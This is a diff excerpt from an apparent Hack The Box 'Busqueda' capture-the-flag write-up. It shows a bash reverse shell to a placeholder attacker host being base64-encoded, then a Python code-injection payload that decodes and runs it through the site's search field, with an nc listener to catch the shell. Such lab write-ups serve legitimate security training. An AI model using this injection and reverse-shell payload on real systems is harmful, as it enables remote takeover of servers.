0hmsec/0hmsec.github.io/_posts/en/2025-02-01-htb-busqueda.md

 0hmsec@kali:-$ echo -ne "bash -c 'bash -i >& /dev/tcp/KALI_IP/PORT 0>&1'" | base64
 ```

+The final payload.

 ```python
 ' + __import__('os').popen('echo {BASE64_ENCODED_CODE}|base64 -d|bash -i').read() + '
 ```

-Before passing the payload, we need to have our nc listener running.
-Then we can directly pass the payload in the " What do you want to search for: " on the site - http://searcher.htb/.
+Before passing the payload, we need to have our "nc" listener running.
+Then we directly pass the payload in the "What do you want to search for: " field on the site - http://searcher.htb/.

 ![RCE](/assets/img/posts/htb-busqueda/ss7.png){: .center }
 _RCE_